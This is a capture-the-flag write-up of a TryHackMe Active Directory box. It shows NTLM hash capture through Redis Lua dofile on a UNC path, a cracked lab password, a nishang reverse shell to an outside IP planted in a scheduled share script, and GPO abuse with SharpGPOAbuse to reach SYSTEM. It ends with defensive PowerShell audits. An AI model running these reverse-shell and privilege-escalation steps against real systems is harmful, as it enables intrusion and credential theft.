#tryhackme #activedirectory #medium

![[Pasted image 20250725225727.png]]

# Information Gathering

Nmap TCP scan against all ports

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpall
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 08:16 UTC
Nmap scan report for 10.10.132.71
Host is up (0.18s latency).
Not shown: 65522 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
6379/tcp  open  redis
9389/tcp  open  adws
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49672/tcp open  unknown
49677/tcp open  unknown
49705/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 44.00 seconds
```

One more TCP scan against the open ports found

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 53,135,139,445,464,6379,9389,49666,49667,49671,49672,49677,49705
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 08:19 UTC
Nmap scan report for 10.10.132.71
Host is up (0.19s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
6379/tcp  open  redis         Redis key-value store 2.8.2402
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49672/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -6h38m38s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-07-25T01:41:27
|_  start_date: N/A

Service detection performed.
Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.86 seconds
```

UDP scan against the top 10 ports

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 08:22 UTC
Nmap scan report for 10.10.132.71
Host is up (0.18s latency).

PORT     STATE         SERVICE
53/udp   open          domain
67/udp   open|filtered dhcps
123/udp  open          ntp
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open|filtered snmp
445/udp  open|filtered microsoft-ds
631/udp  open|filtered ipp
1434/udp open|filtered ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds
```

# Enumeration

##### Port 139, 445 - SMB

`smbclient` and `netexec` both confirmed that null authentication and guest access are not allowed.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N -L //$IP
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.132.71 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

![[Pasted image 20250724204854.png]]

##### Port 6379 - Redis

I tried enumerating anything I could on SMB but failed. Since we saw Redis running on port 6379, let's see if it holds some juicy information.

I was able to connect to Redis using `redis-cli`. The `info` command returned some information about the server.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ redis-cli -h $IP
10.10.132.71:6379> info
# Server
redis_version:2.8.2402
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b2a45a9622ff23b7
redis_mode:standalone
os:Windows
arch_bits:64
multiplexing_api:winsock_IOCP
process_id:2328
run_id:62eb0edeeb2e811bd97f91f173b736b2f4fadb12
tcp_port:6379
uptime_in_seconds:3350
uptime_in_days:0
hz:10
lru_clock:8580171
config_file:
...
<SNIP>
```

The `config get *` command lists all of the configuration of the running Redis server, and the value of `dir` gives us a hint about the user: `enterprise-security`.

![[Pasted image 20250724214833.png]]

The Redis documentation says Redis lets users upload and execute `Lua` scripts on the server.

![[Pasted image 20250724220331.png]]

I'm going to take advantage of this and intercept an NTLM hash using `responder`.

![[Pasted image 20250724220913.png]]

Let me briefly explain how this is possible.

1. `Lua` runs the command `dofile("//attacker-IP/wook413")` to open the file.
2. The Windows operating system sees the `//` path and recognizes it as a UNC path, which means a network share.
3. Windows automatically tries to connect to the attacker's IP using the SMB protocol to access the file.
4. During this connection, Windows sends an NTLM authentication request.
5. The attacker (in this case me, wook) listens and captures the NTLM hash sent by Windows using `responder`.

Let's crack the hash using `hashcat`. The password is `sand_0873959498`.

![[Pasted image 20250724230458.png]]

I enumerated users and shares in the domain using `nxc` with the `enterprise-security` credentials.

![[Pasted image 20250724231154.png]]

We have six shares. I learned that `ADMIN$`, `C$`, and `IPC$` are standard SMB shares and that `NETLOGON` and `SYSVOL` are standard on a DC. That makes `Enterprise-Share` stand out, and we have `READ` and `WRITE` permissions on it.

![[Pasted image 20250724231726.png]]

There's a single file named `PurgeIrrelevantData_1826.ps1`, which I am going to download.

![[Pasted image 20250724232041.png]]

The code inside the file appears to delete everything under the `C:\Users\Public\Documents\` folder. I suspect this file might be run by a scheduled task.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat PurgeIrrelevantData_1826.ps1
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
```

Because we have `WRITE` permission on the share, we can write a reverse shell, overwrite the file and see if it gets executed. I used `nishang`'s `Invoke-PowerShellTcp.ps1` reverse shell and added the following line at the very end so it is invoked: `Invoke-PowerShellTcp -Reverse -IPAddress 10.13.89.243 -Port 1234`. I overwrote the file and, after a second or two, I caught the shell!

![[Pasted image 20250724235628.png]]

Found `user.txt`

![[Pasted image 20250724235820.png]]

# Privilege Escalation

`whoami /priv` reveals that the current user has `SeImpersonatePrivilege` enabled.

![[Pasted image 20250725210841.png]]

So I looked at the running services and found that the `Print Spooler` service is running. In that case there is a good chance we can leverage it with the `PrintSpoofer.exe` tool for privilege escalation.

![[Pasted image 20250725211301.png]]

Even though the service was running and I successfully transferred the `PrintSpoofer.exe` file, I couldn't get a shell.

![[Pasted image 20250725212332.png]]

##### Bloodhound

I transferred `SharpHound.exe` to the remote Windows system to collect data before firing up Bloodhound CE. Usually I use `bloodhound-python` as my go-to collector because I do not like transferring files repeatedly, but for some reason `bloodhound-python` was not working properly, so I had to use `SharpHound.exe` instead.
![[Pasted image 20250725220901.png]]

After collecting the data, I moved the file back to my Kali machine.

![[Pasted image 20250725220915.png]]

I uploaded the `.zip` file to Bloodhound to map out the AD.

![[Pasted image 20250725221027.png]]

I found that our current user, `enterprise-security`, has `GenericWrite` over the `SECURITY-POL-VN` node, a GPO that grants privileges across the system. To exploit this GPO, I am going to use `SharpGPOAbuse`.

![[Pasted image 20250725224022.png]]

First I had to transfer the `SharpGPOAbuse.exe` file over to the remote Windows system from my Kali machine.

![[Pasted image 20250725225101.png]]

Then I ran the following command:

`.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount enterprise-security --GPOName 'SECURITY-POL-VN'`

![[Pasted image 20250725225246.png]]

Then I ran `gpupdate /force` to apply the new group policy.

![[Pasted image 20250725225345.png]]

Since we should have local admin access now, I'm going to use `psexec` to spawn a shell. As you can see from the screenshot below, I successfully logged in as the `SYSTEM` user.

![[Pasted image 20250725225526.png]]

Found `system.txt`

![[Pasted image 20250725225650.png]]
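The Redis chain explained above (steps 2 to 4) leaves a trace on the Windows side: an outbound SMB connection from the host to an address that is not one of its file servers or DCs. As an added example, written for this note and not part of the room, Redis or responder, the following PowerShell hunts Sysmon network-connection events for exactly that; it assumes Sysmon is installed with Event ID 3 logging enabled, and the `$knownSmbServers` allow-list is a placeholder to fill in for your environment.

```powershell
# Added example (not from the writeup): hunt Sysmon network-connection events
# for outbound SMB to hosts that are not known file servers or DCs.
# Note: the SMB client lives in the kernel redirector, so Sysmon attributes the
# connection to the "System" process rather than to redis-server.exe; the
# destination, not the image name, is therefore the useful signal.
# Assumptions: Sysmon with Event ID 3 logging; $knownSmbServers is lab-specific.
$knownSmbServers = @('10.10.132.71')     # placeholder: your DCs and file servers
$smbPorts        = @('139', '445')

$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Sysmon/Operational'
    Id      = 3                           # Sysmon: network connection detected
} -ErrorAction SilentlyContinue

$findings = foreach ($e in $events) {
    # Flatten the <Data Name="..."> nodes of EventData into a hashtable
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($field in $xml.Event.EventData.Data) { $data[$field.Name] = $field.'#text' }

    if ($data['Initiated']       -ne 'true')           { continue }   # outbound only
    if ($data['DestinationPort'] -notin $smbPorts)     { continue }
    if ($data['DestinationIp']   -in $knownSmbServers) { continue }

    [pscustomobject]@{
        Time        = $e.TimeCreated
        Image       = $data['Image']      # expected to read "System" for the redirector
        Destination = "$($data['DestinationIp']):$($data['DestinationPort'])"
        DestName    = $data['DestinationHostname']
    }
}

# Each row is an SMB connection this machine initiated to a host outside the
# allow-list; on this box that is the connection responder received.
$findings | Sort-Object Time | Format-Table -AutoSize
```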
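For the Enterprise-Share foothold above, the condition a defender wants to find is a scheduled task that runs a file stored on a share where non-administrators can write. This PowerShell audit is an added example, not from the writeup or the room, meant to run on the Windows host as an administrator; the `$trusted` principal list is an assumption.

```powershell
# Added example (not from the writeup): find scheduled tasks whose action runs a
# program or script stored under an SMB share that non-administrators can modify.
# That combination is what turned the PurgeIrrelevantData_1826.ps1 overwrite
# into a shell. Run locally on the server as an administrator.
# Assumption: $trusted lists the principals allowed to hold write access on shares.
$trusted = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM', 'CREATOR OWNER')

# 1. Shares (excluding IPC$, which has no path) where someone outside $trusted can write
$writableShares = foreach ($share in (Get-SmbShare | Where-Object Path)) {
    $writers = Get-SmbShareAccess -Name $share.Name | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.AccessRight -in @('Full', 'Change') -and
        $_.AccountName -notin $trusted
    }
    if ($writers) {
        [pscustomobject]@{
            Name    = $share.Name
            Path    = $share.Path.TrimEnd('\')
            Writers = ($writers.AccountName -join ', ')
        }
    }
}

# 2. Task actions whose program or arguments point into one of those share paths,
#    either by local path (C:\Share\...) or by UNC (\\HOST\Share\...)
$findings = foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        $target = "$($action.Execute) $($action.Arguments)".Trim()
        foreach ($share in $writableShares) {
            $unc = "\\$env:COMPUTERNAME\$($share.Name)"
            if ($target -like "*$($share.Path)\*" -or $target -like "*$unc\*") {
                [pscustomobject]@{
                    Task    = $task.TaskPath + $task.TaskName
                    RunsAs  = $task.Principal.UserId
                    Action  = $target
                    Share   = $share.Name
                    Writers = $share.Writers
                }
            }
        }
    }
}

# Share-level Change/Full is only the first gate: confirm with Get-Acl on the
# file itself, since NTFS permissions can still deny the write.
$findings | Format-Table -AutoSize
```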
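For the GPO step above, the matching check from the defender's side is which non-default principals can edit a GPO and where that GPO is linked. The following PowerShell is an added example (not from the writeup, BloodHound or SharpGPOAbuse) that uses the GroupPolicy RSAT module; the `$defaultEditors` list and the commented remediation line are assumptions to adapt per domain.

```powershell
# Added example (not from the writeup): audit GPO permissions for trustees outside
# the default editing principals, and show where each such GPO is linked.
# Assumes the GroupPolicy RSAT module and an account that can read GPO security;
# $defaultEditors is an assumption and should be adjusted per domain.
Import-Module GroupPolicy

$defaultEditors = @('Domain Admins', 'Enterprise Admins', 'SYSTEM')
# Rights that allow changing a GPO's settings. A BloodHound GenericWrite edge on the
# policy object shows up here as GpoEdit, or as GpoCustom when GPMC cannot express
# the ACE exactly, so both are included.
$editRights = @('GpoEdit', 'GpoEditDeleteModifySecurity', 'GpoCustom')

$findings = foreach ($gpo in Get-GPO -All) {
    $risky = Get-GPPermission -Guid $gpo.Id -All | Where-Object {
        $_.Permission.ToString() -in $editRights -and
        $_.Trustee.Name -notin $defaultEditors
    }
    if (-not $risky) { continue }

    # Scope: the sites, domains and OUs this GPO is linked to, from the XML report
    $report = [xml](Get-GPOReport -Guid $gpo.Id -ReportType Xml)
    $links  = ($report.GPO.LinksTo | ForEach-Object { $_.SOMPath }) -join '; '

    foreach ($p in $risky) {
        [pscustomobject]@{
            GPO      = $gpo.DisplayName
            Trustee  = "$($p.Trustee.Domain)\$($p.Trustee.Name)"
            Right    = $p.Permission
            LinkedTo = $links
        }
    }
}

$findings | Format-Table -AutoSize

# Remediation for a confirmed finding (uncomment after review): remove the trustee's
# rights on that GPO, then refresh policy on affected machines with gpupdate /force.
# Set-GPPermission -Guid <gpo-guid> -TargetName 'enterprise-security' -TargetType User -PermissionLevel None -Replace
```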